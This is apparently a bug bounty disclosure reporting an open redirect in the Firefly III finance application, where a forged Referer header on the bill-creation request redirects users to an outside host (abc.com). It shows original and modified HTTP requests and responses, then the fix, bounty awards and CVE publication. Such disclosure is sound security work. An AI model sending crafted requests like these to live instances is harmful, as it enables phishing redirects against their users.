Open Redirect in firefly-iii/firefly-iii

Valid

Reported on

Oct 1st 2021


Steps:

  1. Login in application and and navigate to bill section and create bill and capture the request.

Web applications use different techniques to redirect users to the next page. Apps may use URL query parameters, header values, with JavaScript code, or it may be backend code. In case of this application, the value of the “Referer” header was used to redirect to next page.

Original Request:

POST /bills/store HTTP/1.1

Host: demo.firefly-iii.org

.

.

.

Original Response:

HTTP/1.1 302 Found

location: https://demo.firefly-iii.org/bills/create

.

.

.

Modified Request:

POST /bills/store HTTP/1.1

Host: demo.firefly-iii.org

Referer: http://abc.com/

.

.

.

Modified Response:

HTTP/1.1 302 Found

location: http://abc.com/

<!DOCTYPE html>

<html>

<head>

<meta charset="UTF-8" />

<meta http-equiv="refresh" content="0;url='http://abc.com/'" />

<title>Redirecting to http://abc.com/</title>

</head>

<body>

Redirecting to <a href="http://abc.com/">http://abc.com/</a>.

</body>

</html>

We have contacted a member of the firefly-iii team and are waiting to hear back 2 months ago
James Cole validated this vulnerability 2 months ago
takester has been awarded the disclosure bounty
The fix bounty is now up for grabs
James Cole confirmed that a fix has been merged on 8662df 2 months ago
James Cole has been awarded the fix bounty
Jamie Slome
a month ago

Admin


CVE published! 🎊

takester
a month ago

Researcher


Thanks🎊